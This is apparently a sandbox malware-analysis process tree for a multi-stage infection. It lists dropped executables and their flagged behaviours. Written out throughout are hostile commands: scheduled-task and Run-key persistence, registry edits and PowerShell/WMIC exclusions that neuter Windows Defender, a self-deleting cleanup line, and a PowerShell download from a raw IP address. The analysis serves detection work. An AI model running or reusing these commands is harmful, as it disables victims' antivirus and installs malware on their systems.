- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\xkaejX0YmnomZWv0dC4Z.exe"C:\Users\Admin\AppData\Local\Temp\spanfPJ7anATNtDy\xkaejX0YmnomZWv0dC4Z.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\1000004002\86c8a83869.exe"C:\Users\Admin\1000004002\86c8a83869.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"9⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 2688⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2408⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit9⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 510⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"8⤵
-
C:\Users\Admin\Pictures\eEzAEB1XboUpapVzn6iOoqeJ.exe"C:\Users\Admin\Pictures\eEzAEB1XboUpapVzn6iOoqeJ.exe" /s9⤵
-
C:\Users\Admin\Pictures\uEp9V6DDJeK5MOywyGbxHweG.exe"C:\Users\Admin\Pictures\uEp9V6DDJeK5MOywyGbxHweG.exe"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"10⤵
-
C:\Users\Admin\Pictures\nxJ0h8xu4ON4TG9IlaA30I8z.exe"C:\Users\Admin\Pictures\nxJ0h8xu4ON4TG9IlaA30I8z.exe"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"10⤵
-
C:\Users\Admin\Pictures\AZHzthQ1QIvJvukNlgQEfcY9.exe"C:\Users\Admin\Pictures\AZHzthQ1QIvJvukNlgQEfcY9.exe"9⤵
-
C:\Users\Admin\Pictures\u9AmwU8KnGU7RAtop3xLOLH7.exe"C:\Users\Admin\Pictures\u9AmwU8KnGU7RAtop3xLOLH7.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS51C0.tmp\Install.exe.\Install.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS55F6.tmp\Install.exe.\Install.exe /yrVdidRYRgn "385118" /S11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"12⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 614⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 615⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 614⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 615⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 614⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 615⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 614⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 615⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force15⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True14⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True15⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 15:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS55F6.tmp\Install.exe\" PP /UhSdidMnTv 385118 /S" /V1 /F12⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"8⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\onefile_6880_133616426740036953\stub.exe"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"9⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"9⤵
-
C:\Windows\system32\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
-
C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\1000042001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9437.tmp\Install.exe.\Install.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS96F7.tmp\Install.exe.\Install.exe /ldidSUmY "385134" /S9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
-
C:\Users\Admin\AppData\Local\Temp\1000005001\9f7ce75d1a.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\9f7ce75d1a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zSFC80.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSFC80.tmp\Install.exe Ww /nDEdidhReo 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
